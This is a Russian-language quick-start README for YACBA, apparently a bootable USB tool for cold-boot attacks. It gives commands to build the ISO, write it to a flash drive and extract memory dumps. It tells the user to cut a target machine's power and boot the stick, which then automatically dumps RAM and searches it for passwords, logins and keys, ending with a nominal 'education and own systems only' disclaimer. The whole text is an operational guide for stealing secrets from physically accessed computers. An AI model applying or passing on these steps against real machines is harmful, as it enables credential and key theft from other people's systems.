YACBA - Быстрый старт

Что это?

Автономная флешка с собственной ОС для cold-boot атак. Вставил флешку → перезагрузился → система дампит память.

Сборка и создание ISO

Автоматический способ:

make docker-iso    # через Docker (любая ОС)
make iso           # нативная сборка (Linux)

Пошагово:

# Сборка
./docker-build.sh  # или ./build.sh на Linux

# Создание ISO
./build-iso.sh

Создание носителя

Из ISO (рекомендуется):

# Запись на флешку
sudo dd if=yacba-coldboot-*.iso of=/dev/sdX bs=1M status=progress

# Или прямое создание флешки
sudo ./create_boot_usb.sh /dev/sdX

Использование

Выключить целевую систему (выдернуть питание)
Вставить флешку
Включить систему
Флешка загрузится и начнет дамп автоматически
Дождаться завершения (прогресс на экране)

Что дампится

Память с адресов 1MB, 16MB, 256MB
Поиск паттернов: пароли, логины, ключи
Данные сохраняются в RAW формате на втором разделе
Заголовок с сигнатурой "YACBA" + размер дампа

Извлечение дампа

После использования:

# Автоматическое извлечение и анализ
sudo ./extract_dump.sh /dev/sdX

# Или ручное извлечение
sudo dd if=/dev/sdX2 of=memdump.bin bs=512 skip=1

# Проверка заголовка
hexdump -C /dev/sdX2 | head -2
# 00000000  59 41 43 42 41 01 00 00  00 10 00 00 00 04 00 00
#           Y  A  C  B  A  v1        size=4KB   sectors=4

# Анализ
strings memdump.bin | grep -i password
hexdump -C memdump.bin | less

⚠️ Только для образования и своих систем!

2.2 KiB Raw Permalink Blame History Unescape Escape